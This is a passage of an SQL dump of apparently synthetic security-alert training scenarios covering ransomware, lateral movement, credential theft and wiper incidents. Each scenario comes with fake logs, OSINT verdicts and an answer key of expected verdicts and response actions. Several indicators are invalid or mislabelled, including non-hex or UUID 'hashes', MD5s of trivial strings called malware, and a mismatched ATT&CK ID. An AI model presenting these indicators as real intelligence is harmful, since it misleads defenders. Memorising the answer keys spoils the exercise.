`is_ai_generated`, `sector_code`) VALUES (509, 'Persistence Mechanism Established', 'high', 'System Logs', 'The attacker has established persistence on the compromised systems by modifying registry keys and creating scheduled tasks, ensuring the ransomware re-executes upon reboot.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"registry_key_modified\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"scheduled_task_created\":\"\\\\Windows\\\\System32\\\\Tasks\\\\MaliciousTask\",\"malware_file\":\"ransomware_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Filename commonly associated with ransomware attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (510, 'SMB Propagation Detected', 'high', 'Network Traffic Analysis', 'A potential lateral movement was detected on the network using the SMB protocol. An internal host is attempting to spread ransomware to other vulnerable machines within the network.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:22Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"malware_hash\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"malware_filename\":\"ransomware_payload.exe\",\"username\":\"jdoe\",\"activity\":\"smb_connection_attempt\",\"status\":\"failed\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential source of lateral movement within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential target of lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used in previous ransomware attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known ransomware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware propagation.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"suspicious\",\"details\":\"User potentially compromised for lateral movement activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (511, 'Kill-Switch Domain Investigated', 'high', 'DNS Query Logs', 'An investigation has identified suspicious DNS queries related to the WannaCry kill-switch mechanism. The queries originated from an internal host querying a known kill-switch domain, indicating potential infection or reconnaissance activity.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:30Z\",\"source_ip\":\"192.168.1.105\",\"queried_domain\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"query_type\":\"A\",\"response\":\"92.242.132.24\",\"associated_filename\":\"wannacry.exe\",\"associated_hash\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"internal_user\":\"jdoe\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_review\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known kill-switch domain for WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Executable known to be associated with WannaCry ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (512, 'Encryption Logic Analysis', 'high', 'File System Analysis', 'Analysts are examining the encryption logic of a ransomware strain to determine if there are any exploitable flaws that could allow decryption without payment. The analysis has identified several encrypted files and potential indicators of compromise.', 'Data Encryption', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"FS123456789\",\"user\":\"jdoe\",\"source_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"encrypted_document.docx\",\"malware_hash\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"encryption_algorithm\":\"AES-256\",\"process\":\"ransomware.exe\",\"internal_network\":\"192.168.1.0/24\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_document.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File is encrypted and cannot be opened without a decryption key.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee user account potentially impacted.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (513, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP) System', 'An advanced attempt to exfiltrate sensitive data was detected. Before encrypting files, the attacker tried to send critical company data to an external server.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:35Z\",\"event_type\":\"data_exfiltration_attempt\",\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file\":\"financial_report_q3_2023.xlsx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLP-20231010-001\",\"message\":\"Sensitive data transfer attempt detected and blocked by DLP.\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address from company network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with data exfiltration campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Registered employee username.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Database\",\"verdict\":\"clean\",\"details\":\"Legitimate company file.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (514, 'Ransom Note Deployment', 'high', 'User Reports', 'In the final step of the attack chain, the attacker deployed a ransom note to the affected systems, demanding payment in exchange for the decryption key. This action follows the encryption of critical files across multiple hosts.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_id\":\"1209\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"ransom_note_filename\":\"READ_ME.txt\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"message\":\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"host\":\"victim-host-01\",\"malware_name\":\"Ryuk\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for Ryuk ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified as victim\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Account used during the attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Standard ransom note file for Ryuk\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Ryuk ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (515, 'Compromised Software Update Detected', 'high', 'Network Traffic Analysis', 'A malicious update for the accounting software \'FinancePro\' was detected being distributed from a trusted update channel, indicating a supply chain compromise. The update includes a known malicious payload linked to the Sandworm group.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"file_hash\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"file_name\":\"FinancePro_Update_v4.2.exe\",\"user\":\"jdoe\",\"update_channel\":\"update.financepro.com\",\"action\":\"download\",\"malware_family\":\"NotPetya\"}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Sandworm APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"FinancePro_Update_v4.2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected update file detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (516, 'MBR Overwriting Activity Observed', 'high', 'Endpoint Detection and Response (EDR)', 'An alert has been triggered due to the detection of destructive malware that targets the Master Boot Record (MBR) of the system. The malware, associated with the Sandworm group, attempts to overwrite the MBR, rendering the system unbootable under the guise of a ransomware attack. Immediate action is required to prevent further damage.', 'Destructive Malware Execution', 'T1490 - Inhibit System Recovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:58Z\",\"event_id\":\"EDR-4521\",\"system\":{\"hostname\":\"workstation-12\",\"ip_address\":\"192.168.1.45\",\"os\":\"Windows 10\"},\"user\":\"jdoe\",\"process\":{\"name\":\"malware_payload.exe\",\"path\":\"C:\\\\Windows\\\\Temp\\\\malware_payload.exe\",\"hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\"},\"network\":{\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443},\"action\":\"MBR overwrite attempt\",\"indicator_of_compromise\":{\"file_hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"attacker_ip\":\"203.0.113.5\"}}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known destructive malware hash associated with Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous malicious activities linked to Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (517, 'Mimikatz Credential Harvesting Detected', 'high', 'Security Information and Event Management (SIEM)', 'The attackers leverage Mimikatz to harvest credentials from compromised systems, preparing for rapid lateral movement across the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:33Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"logon_type\":\"Interactive\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\mimikatz.exe\",\"process_id\":\"5678\",\"hash\":\"6f5902ac237024bdd0c176cb93063dc4\",\"filename\":\"mimikatz.exe\",\"os_version\":\"Windows 10\",\"domain\":\"example.local\"}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with credential theft campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Executable file commonly used for credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (518, 'Rapid Lateral Movement Identified', 'high', 'Anomalous Account Activity', 'With credentials in hand, the attackers move laterally across the network, spreading the destructive wiper payload to additional systems.', 'Lateral Movement', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_source\":\"authentication_logs\",\"user\":\"jdoe_admin\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"192.168.1.101\",\"action\":\"login_success\",\"description\":\"Successful login using compromised credentials.\",\"malicious_file\":\"OlympicDestroyer_v2.exe\",\"file_hash\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\"}', '2026-01-06 01:37:06', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"malicious\",\"details\":\"Account used for unauthorized lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OlympicDestroyer_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Destructive malware associated with Sandworm APT.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known wiper malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL), (519, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP)', 'An unauthorized data exfiltration attempt was detected involving the transfer of sensitive files to an external IP address. The threat actor, identified by the use of known malware hashes and suspicious IP addresses, attempted to leverage their access to exfiltrate critical data before initiating a destructive attack.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"action\":\"upload\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-EXFIL-005\",\"description\":\"Detected upload of sensitive data to external IP address\",\"malware_associated\":[\"NotPetya\"]}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Filename flagged as containing sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (520, 'Suspicious Network Traffic Detected', 'medium', 'Network Intrusion Detection System (NIDS)', 'Unusual traffic patterns have been detected originating from a popular news site, indicating a potential drive-by download attempt aimed at gaining initial access.', 'Drive-by Download', 'T1189', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"http_request\":{\"method\":\"GET\",\"url\":\"http://news.example.com/malicious.js\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://news.example.com/home\"},\"malware_hash\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"filename\":\"malicious.js\"}', '2026-01-06 01:39:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host possibly compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"IP associated with previous drive-by download activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://news.example.com/malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosts a known malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a5c4f89d1b2e5f4c3b2a8e1e6f4b3c4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"JavaScript file with obfuscated code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (521, 'Unverified Flash Update Executed', 'high', 'Endpoint Detection and Response (EDR)', 'A fake Adobe Flash update was executed on the endpoint, leading to the installation of a ransomware payload. The operation is part of a broader campaign aiming to deploy ransomware via social engineering tactics.', 'Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-5G9H1F2\",\"user\":\"john_doe\",\"process_name\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\fake_flash_update.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"src_ip\":\"102.54.98.112\",\"internal_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\\",\"event_type\":\"Execution\",\"description\":\"A suspicious application resembling Adobe Flash Player was executed, which is known to deploy ransomware payloads.\"}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"fake_flash_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known ransomware delivery mechanism disguised as Adobe Flash update.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"102.54.98.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known C2 servers.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the affected machine.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (522, 'DiskCryptor Ransomware Detected', 'high', 'File Integrity Monitoring', 'DiskCryptor has been activated on the victim\'s machine, initiating encryption of the hard drive and establishing ransomware persistence.', 'Persistence', 'T1486 - Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:36Z\",\"event_id\":\"FIM-2023-5698\",\"file_path\":\"C:\\\\Program Files\\\\DiskCryptor\\\\dcinst.exe\",\"file_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"user\":\"compromised_user\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"event_type\":\"file_change\",\"description\":\"Unauthorized execution of DiskCryptor detected. File integrity compromised.\",\"additional_info\":{\"protocol\":\"HTTPS\",\"connection_status\":\"Active\"}}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', 